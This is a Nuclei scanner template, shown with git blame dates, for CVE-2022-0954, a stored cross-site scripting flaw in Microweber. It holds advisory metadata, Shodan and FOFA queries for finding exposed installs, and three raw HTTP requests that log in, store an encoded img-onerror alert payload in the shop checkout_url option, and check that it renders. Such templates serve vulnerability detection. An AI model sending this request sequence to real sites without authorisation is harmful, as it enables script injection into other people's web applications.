nuclei-templates/http/cves/2022/CVE-2022-0954.yaml

67 lines
2.9 KiB
YAML
Raw Normal View History

2022-07-26 18:09:48 +00:00
id: CVE-2022-0954
2022-07-26 12:44:16 +00:00
info:
name: Microweber <1.2.11 - Stored Cross-Site Scripting
2022-07-28 16:19:23 +00:00
author: amit-jd
severity: medium
2022-07-26 18:03:38 +00:00
description: |
Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability.
2022-07-26 12:44:16 +00:00
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
2022-07-28 16:19:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
- https://github.com/ARPSyndicate/kenzer-templates
2022-07-26 12:44:16 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0954
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00144
2024-05-31 19:23:20 +00:00
epss-percentile: 0.50194
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-07-26 18:06:21 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
2024-05-31 19:23:20 +00:00
shodan-query: http.favicon.hash:780351152
fofa-query: body="microweber"
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,xss,microweber,huntr
2022-07-26 12:44:16 +00:00
http:
2022-07-26 12:44:16 +00:00
- raw:
2022-07-26 18:03:38 +00:00
- |
2022-07-26 12:44:16 +00:00
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
2022-07-26 18:03:38 +00:00
- |
2022-07-26 12:44:16 +00:00
POST /api/save_option HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
2022-07-26 18:03:38 +00:00
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
- |
2022-07-26 12:44:16 +00:00
POST /module/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
2022-07-26 18:03:38 +00:00
matchers:
- type: dsl
dsl:
- 'contains(body_2,"true")'
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
- 'contains(header_3,"text/html")'
2022-07-26 18:03:38 +00:00
- 'status_code_3==200'
condition: and
# digest: 4a0a0047304502207e4a03981dc32fe14244fb81dc5fbf27e611f0610881b12bab441ef665f244ce022100ca4d7b70e4c8aade25ea13a241809d1a4a6e8fcc75dabfbd42f23db0314190ea:922c64590222798bb761d5b6d8e72950